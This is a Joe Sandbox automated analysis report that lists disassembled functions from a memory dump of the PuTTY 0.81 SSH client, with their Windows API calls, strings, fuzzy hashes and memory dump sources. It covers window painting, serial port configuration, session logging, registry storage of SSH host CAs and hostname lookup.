String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
API String ID: 2400502282-2889948183
Opcode ID: af7e900566eeaab05af0dc183a8dfeaa3f51c703768e5a55bcac3d6a918a64e1
Instruction ID: 24757647153489c8b5043ec8f61901106c568191f2fc2e158696eb758afc382f
Opcode Fuzzy Hash: af7e900566eeaab05af0dc183a8dfeaa3f51c703768e5a55bcac3d6a918a64e1
Instruction Fuzzy Hash: 84A1D322A1C68681EA609B1DEA403BA67A4BF8D784F501132DF4DD77B5EFBCE145CB01

Function 00007FF6BB2AB3E0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32 ref: 00007FF6BB2AB48C
GetSysColor.USER32 ref: 00007FF6BB2AB4A5
GetSysColor.USER32 ref: 00007FF6BB2AB4B2
SystemParametersInfoA.USER32 ref: 00007FF6BB2AB4EF
CreateFontIndirectA.GDI32 ref: 00007FF6BB2AB4FD
SetWindowTextA.USER32 ref: 00007FF6BB2AB538
CreateCompatibleDC.GDI32 ref: 00007FF6BB2AB545
GetTextExtentPoint32A.GDI32 ref: 00007FF6BB2AB56C
DeleteDC.GDI32 ref: 00007FF6BB2AB575
GetWindowRect.USER32 ref: 00007FF6BB2AB583
CreateWindowExA.USER32 ref: 00007FF6BB2AB5EE
ShowWindow.USER32 ref: 00007FF6BB2AB603

Strings

%dx%d, xrefs: 00007FF6BB2AB50A
SizeTipClass, xrefs: 00007FF6BB2AB475

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem
String ID: %dx%d$SizeTipClass
API String ID: 2854742871-2531271423
Opcode ID: f7515fb9561d3e7211efaef6d9f75087dc22f02ad6e7786d986b3a5eb1af66d5
Instruction ID: 8a0eb7567a408a49751f9cf4deff303c7f97121bd265423ae80ef992eac5b392
Opcode Fuzzy Hash: f7515fb9561d3e7211efaef6d9f75087dc22f02ad6e7786d986b3a5eb1af66d5
Instruction Fuzzy Hash: 56512D35A18A9186EB608B19F8543AE77A4FB8C740F604535DA8D837B4DF3CE484CF00

Function 00007FF6BB2AB748 Relevance: 24.1, APIs: 16, Instructions: 83COMMON

Download Yara Rule

APIs

BeginPaint.USER32 ref: 00007FF6BB2AB750
SelectObject.GDI32 ref: 00007FF6BB2AB76A
GetStockObject.GDI32 ref: 00007FF6BB2AB771
SelectObject.GDI32 ref: 00007FF6BB2AB77D
CreateSolidBrush.GDI32 ref: 00007FF6BB2AB785
SelectObject.GDI32 ref: 00007FF6BB2AB794
GetClientRect.USER32 ref: 00007FF6BB2AB7A1
Rectangle.GDI32 ref: 00007FF6BB2AB7C0
GetWindowTextLengthA.USER32 ref: 00007FF6BB2AB7C9
GetWindowTextA.USER32 ref: 00007FF6BB2AB7F5
SetTextColor.GDI32 ref: 00007FF6BB2AB804
SetBkColor.GDI32 ref: 00007FF6BB2AB813
TextOutA.GDI32 ref: 00007FF6BB2AB833
SelectObject.GDI32 ref: 00007FF6BB2AB847
DeleteObject.GDI32 ref: 00007FF6BB2AB850
EndPaint.USER32 ref: 00007FF6BB2AB85E

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Object$SelectText$ColorPaintWindow$BeginBrushClientCreateDeleteLengthRectRectangleSolidStock
String ID:
API String ID: 3492845075-0
Opcode ID: 7e9a717d7edbe5d80fc8d994b6dc1af8a7db0be75ff63c67b76f7914f5aba910
Instruction ID: 195ff96442940aafc20a0d8cc4047ab3ce02aa52ffc30540320d4bae11387724
Opcode Fuzzy Hash: 7e9a717d7edbe5d80fc8d994b6dc1af8a7db0be75ff63c67b76f7914f5aba910
Instruction Fuzzy Hash: 1E317C25B196128ADA14DB1AE95423EB766FB8DFD1F614031DE0E83B74DE3CE4458F00

Function 00007FF6BB288440 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF6BB288459
MessageBeep.USER32 ref: 00007FF6BB288470
GetTickCount.KERNEL32 ref: 00007FF6BB288476
GetTickCount.KERNEL32 ref: 00007FF6BB288487
Beep.KERNEL32 ref: 00007FF6BB2884B3
ShowCursor.USER32 ref: 00007FF6BB288512
MessageBoxA.USER32 ref: 00007FF6BB28855A
GetTickCount.KERNEL32 ref: 00007FF6BB288594

Strings

, xrefs: 00007FF6BB28B87E
Unable to play sound file%sUsing default sound instead, xrefs: 00007FF6BB288522
%s Sound Error, xrefs: 00007FF6BB288538

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CountTick$BeepMessage$CursorShow
String ID: $%s Sound Error$Unable to play sound file%sUsing default sound instead
API String ID: 3991535243-2085220474
Opcode ID: 605db92201ef87f0b9144a2cb1fe46a1c0df5a59fb2c3575cd781497937c0e99
Instruction ID: 466d9aa056fb7b86ad3a95b0fb5a7b403d8e77e77ff4529ccf34eeebe0cbc1a3
Opcode Fuzzy Hash: 605db92201ef87f0b9144a2cb1fe46a1c0df5a59fb2c3575cd781497937c0e99
Instruction Fuzzy Hash: A8715725E1D64285FB509B2DEA9837D26A0BF8C790F240539DB4DD6BB1EF3DE4858B00

Function 00007FF6BB2B4E40 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

GetCommState.KERNEL32 ref: 00007FF6BB2B4E69

Strings

Configuring baud rate %lu, xrefs: 00007FF6BB2B4E9E
Configuring %s parity, xrefs: 00007FF6BB2B4F38
Configuring serial timeouts: %s, xrefs: 00007FF6BB2B5031
Configuring %s, xrefs: 00007FF6BB2B4F01
Invalid number of stop bits (need 1, 1.5 or 2), xrefs: 00007FF6BB2B4F74
Configuring %s flow control, xrefs: 00007FF6BB2B4FC7
Configuring %u data bits, xrefs: 00007FF6BB2B4EC6
Configuring serial port: %s, xrefs: 00007FF6BB2B501B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CommState
String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$Invalid number of stop bits (need 1, 1.5 or 2)
API String ID: 4071006776-1037083001
Opcode ID: 536ec8249279a4cb8f83e3ff0692fb1040bbba668a017307fe617a5e5eae2e30
Instruction ID: e068172746931823b75c2b54c8b490887a1843c0d62404fb0ebc4b1a012cf2cd
Opcode Fuzzy Hash: 536ec8249279a4cb8f83e3ff0692fb1040bbba668a017307fe617a5e5eae2e30
Instruction Fuzzy Hash: A341AD62B0864681EE20AB29D9521BA2360FF8DB80F544231DB4EC7BB6DE7CE5458741

Function 00007FF6BB2A2860 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32 ref: 00007FF6BB2A28AA
SetDlgItemTextA.USER32 ref: 00007FF6BB2A2902

Part of subcall function 00007FF6BB2CB550: GetDlgItem.USER32 ref: 00007FF6BB2CB559
Part of subcall function 00007FF6BB2CB550: GetWindowLongPtrA.USER32 ref: 00007FF6BB2CB571
Part of subcall function 00007FF6BB2CB550: GetWindowLongPtrA.USER32 ref: 00007FF6BB2CB57E
Part of subcall function 00007FF6BB2CB550: SetWindowLongPtrA.USER32(?,?,00000000,00000000,?,?,00007FF6BB2A2915), ref: 00007FF6BB2CB5A3
Part of subcall function 00007FF6BB2CB550: SetWindowLongPtrA.USER32(?,?,00000000,00000000,?,?,00007FF6BB2A2915), ref: 00007FF6BB2CB5B1
Part of subcall function 00007FF6BB2CB550: SetWindowPos.USER32 ref: 00007FF6BB2CB5D7

ShellExecuteA.SHELL32 ref: 00007FF6BB2A2967
EndDialog.USER32 ref: 00007FF6BB2A2977
EnableWindow.USER32 ref: 00007FF6BB2A2998
DialogBoxParamA.USER32 ref: 00007FF6BB2A29B9
EnableWindow.USER32 ref: 00007FF6BB2A29C7
SetActiveWindow.USER32 ref: 00007FF6BB2A29CC

Strings

About %s, xrefs: 00007FF6BB2A2892
Release 0.81, xrefs: 00007FF6BB2A28DA
https://www.chiark.greenend.org.uk/~sgtatham/putty/, xrefs: 00007FF6BB2A2958
%s%s%s%s, xrefs: 00007FF6BB2A28D3
open, xrefs: 00007FF6BB2A2951

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Long$DialogEnableItemText$ActiveExecuteParamShell
String ID: %s%s%s%s$About %s$Release 0.81$https://www.chiark.greenend.org.uk/~sgtatham/putty/$open
API String ID: 2657381607-3057346242
Opcode ID: 6952c6024eb044a4cf255fce5e15fce89d7ff5a7c29b67778af4aa0c89b7d8c6
Instruction ID: eff7ed41c5717da2633e97b63748331d2ab0f91b1e802fb057ebbaac581b1dd1
Opcode Fuzzy Hash: 6952c6024eb044a4cf255fce5e15fce89d7ff5a7c29b67778af4aa0c89b7d8c6
Instruction Fuzzy Hash: 26314C20A1CA0781FA14A71AEA543BD6295BF8CFC0F644532CA4E87AB5DE3CE5468B01

Function 00007FF6BB2FB8B0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 161synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6BB2FBA6F

Part of subcall function 00007FF6BB2FA3E0: GetUserNameA.ADVAPI32 ref: 00007FF6BB2FA4C9
Part of subcall function 00007FF6BB2FA3E0: GetUserNameA.ADVAPI32 ref: 00007FF6BB2FA4FE

Part of subcall function 00007FF6BB32B120: CreateMutexA.KERNEL32 ref: 00007FF6BB32B1A3
Part of subcall function 00007FF6BB32B120: WaitForSingleObject.KERNEL32 ref: 00007FF6BB32B1B9
Part of subcall function 00007FF6BB32B120: LocalFree.KERNEL32 ref: 00007FF6BB32B1EF
Part of subcall function 00007FF6BB32B120: LocalFree.KERNEL32 ref: 00007FF6BB32B1FF

ReleaseMutex.KERNEL32 ref: 00007FF6BB2FBA5E
CloseHandle.KERNEL32 ref: 00007FF6BB2FBA67
ReleaseMutex.KERNEL32 ref: 00007FF6BB2FBB01
CloseHandle.KERNEL32 ref: 00007FF6BB2FBB0A

Part of subcall function 00007FF6BB2FA3E0: GetProcAddress.KERNEL32 ref: 00007FF6BB2FA439

Strings

Local\putty-connshare-mutex, xrefs: 00007FF6BB2FB8EE
*logtext || *ds_err || *us_err, xrefs: 00007FF6BB2FBA32
\\.\pipe\putty-connshare, xrefs: 00007FF6BB2FB938
%s.%s.%s, xrefs: 00007FF6BB2FB8E7, 00007FF6BB2FB931
%s: %s, xrefs: 00007FF6BB2FB999, 00007FF6BB2FB9FA
Unable to call CryptProtectMemory: %s, xrefs: 00007FF6BB2FBA7C
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/sharing.c, xrefs: 00007FF6BB2FBA39

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Mutex$CloseFreeHandleLocalNameReleaseUser$AddressCreateErrorLastObjectProcSingleWait
String ID: %s.%s.%s$%s: %s$*logtext || *ds_err || *us_err$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/sharing.c$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
API String ID: 3466441327-959505643
Opcode ID: 153bf7af21f1d609425a759ed1b883716db0ed5ec76459ce2f89d73c2aae8678
Instruction ID: 1daf9fee5ebfefe5c5e328574651d2cebd6e818541a036b77b6876bad0c23209
Opcode Fuzzy Hash: 153bf7af21f1d609425a759ed1b883716db0ed5ec76459ce2f89d73c2aae8678
Instruction Fuzzy Hash: 83510E25A09B4680EA54AB2ADA593BD2391BF9DFC0F444831DF4E877B6EE3DE405C341

Function 00007FF6BB2ABC70 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB34E168: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB34E19C

Part of subcall function 00007FF6BB2D6500: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00007FF6BB2AB996), ref: 00007FF6BB2D651C

wcsftime.LIBCMT ref: 00007FF6BB2ABD08

Strings

Disabled writing, xrefs: 00007FF6BB2ABD76
%s session log (%s mode) to file: %s, xrefs: 00007FF6BB2ABDA6
SSH raw data, xrefs: 00007FF6BB2ABD62
%Y.%m.%d %H:%M:%S, xrefs: 00007FF6BB2ABCF1
Error writing, xrefs: 00007FF6BB2ABD7D
Appending, xrefs: 00007FF6BB2ABD8B
Writing new, xrefs: 00007FF6BB2ABD92
unknown, xrefs: 00007FF6BB2ABD69
=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=, xrefs: 00007FF6BB2ABD0D
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/logging.c, xrefs: 00007FF6BB2ABDEA
ctx->state != L_OPENING, xrefs: 00007FF6BB2ABDE3

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: LocalTime_invalid_parameter_noinfowcsftime
String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
API String ID: 42641226-759394250
Opcode ID: d1f925c6066ddc6873973fa0135088d95ba991635fbe29c8fcac85f9a80971c2
Instruction ID: 4de6e918a7372e78625877bef4b87f93b03b9d0de454877cd8356064ea26fe2e
Opcode Fuzzy Hash: d1f925c6066ddc6873973fa0135088d95ba991635fbe29c8fcac85f9a80971c2
Instruction Fuzzy Hash: 5B516C65A08A5681FA10DB19E6992BD6361FF89B84F818031DF0DC77A5EF3DE146C700

Function 00007FF6BB281EFB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF6BB281F36
TrackPopupMenu.USER32 ref: 00007FF6BB281F6E
ShowCursor.USER32 ref: 00007FF6BB28286E
GetCursorPos.USER32 ref: 00007FF6BB282883
GetMonitorInfoA.USER32 ref: 00007FF6BB2828C8
IsZoomed.USER32 ref: 00007FF6BB28290B
GetWindowLongPtrA.USER32 ref: 00007FF6BB282921
SendMessageA.USER32 ref: 00007FF6BB282961
DefWindowProcW.USER32 ref: 00007FF6BB283732

Strings

(, xrefs: 00007FF6BB2828B2

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Cursor$Window$InfoLongMenuMessageMonitorPopupProcSendShowTrackZoomed
String ID: (
API String ID: 1195453808-3887548279
Opcode ID: 8f86f2efebeacca7557ac59f5c2cb3069cb5cddfb4d1881aac2acef9b847a86d
Instruction ID: c97353680075e4cebf3aeeb01021f31b64c8d63c56bb9530d3519c4024cef633
Opcode Fuzzy Hash: 8f86f2efebeacca7557ac59f5c2cb3069cb5cddfb4d1881aac2acef9b847a86d
Instruction Fuzzy Hash: 44415D35A0868586FB249B19E9553BE77A0FF8CB50F940434CB8D876B5DF7CE4448B10

Function 00007FF6BB2BEDC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FF6BB2BEE80
inet_addr.WS2_32 ref: 00007FF6BB2BEEAE
htonl.WS2_32 ref: 00007FF6BB2BEEDA
gethostbyname.WS2_32 ref: 00007FF6BB2BEF30
htonl.WS2_32 ref: 00007FF6BB2BEF8A
WSAGetLastError.WS2_32 ref: 00007FF6BB2BEFB5

Strings

Host not found, xrefs: 00007FF6BB2BEF21
Host does not exist, xrefs: 00007FF6BB2BEFE1
Network is down, xrefs: 00007FF6BB2BEFD8

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: htonl$ErrorLastgetaddrinfogethostbynameinet_addr
String ID: Host does not exist$Host not found$Network is down
API String ID: 106626933-2906891963
Opcode ID: bf7234ea546957ea5bbe247780e24ad176e59125ca1e7dfa59c3b22955c8d907
Instruction ID: 39a56f2bb24b99fe005e58601404c25c409abe40431a6972d914ea92c4a51e4a
Opcode Fuzzy Hash: bf7234ea546957ea5bbe247780e24ad176e59125ca1e7dfa59c3b22955c8d907
Instruction Fuzzy Hash: AE51BF21A0864186FB74AB29E95437A72A0FB8CB54F140935EB5E877F1DF7DE4818700

Function 00007FF6BB2BD780 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 102registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C6460: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C652D
Part of subcall function 00007FF6BB2C6460: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000,?,00007FF6BB38EAB3,00000000), ref: 00007FF6BB2C6576

Part of subcall function 00007FF6BB2C6840: RegSetValueExA.ADVAPI32 ref: 00007FF6BB2C6873

Part of subcall function 00007FF6BB2C66F0: RegSetValueExA.ADVAPI32(?,?,?,?,?,?,00000000,00007FF6BB2BD87D), ref: 00007FF6BB2C6724

RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF6BB2AFA31), ref: 00007FF6BB2BD8A8

Strings

CA record must have a name, xrefs: 00007FF6BB2BD8BE
PublicKey, xrefs: 00007FF6BB2BD813
PermitRSASHA256, xrefs: 00007FF6BB2BD882
PermitRSASHA512, xrefs: 00007FF6BB2BD896
Validity, xrefs: 00007FF6BB2BD852
Unable to create registry keyHKEY_CURRENT_USER\%s\%s, xrefs: 00007FF6BB2BD8E4
PermitRSASHA1, xrefs: 00007FF6BB2BD86E
Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00007FF6BB2BD7C9, 00007FF6BB2BD8EB

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CloseValue$Create
String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
API String ID: 1669778273-1463427279
Opcode ID: d9c56a8f4c620c34db8d9f7cb7ad5556053586b23b2d090d3eba4c631fbc0dac
Instruction ID: f912d6c4722296308a8414e1110c86f00f0a0c713608dda57c1ab680efa89d41
Opcode Fuzzy Hash: d9c56a8f4c620c34db8d9f7cb7ad5556053586b23b2d090d3eba4c631fbc0dac
Instruction Fuzzy Hash: 29414261A0CA4644EA11AB2DAA512FE6760BF8DBD4F444531DF8E8B7B7EE3CE045C740

Function 00007FF6BB2B0630 Relevance: 15.1, APIs: 10, Instructions: 84threadtimeclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00007FF6BB2B064E
GetCapture.USER32 ref: 00007FF6BB2B0671
GetClipboardOwner.USER32 ref: 00007FF6BB2B068F
GetQueueStatus.USER32 ref: 00007FF6BB2B06B2
GetCursorPos.USER32 ref: 00007FF6BB2B06D9
GlobalMemoryStatus.KERNEL32 ref: 00007FF6BB2B06FA
GetCurrentThread.KERNEL32 ref: 00007FF6BB2B072B
GetThreadTimes.KERNEL32 ref: 00007FF6BB2B074A
GetCurrentProcess.KERNEL32 ref: 00007FF6BB2B0763
GetProcessTimes.KERNEL32 ref: 00007FF6BB2B077A

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
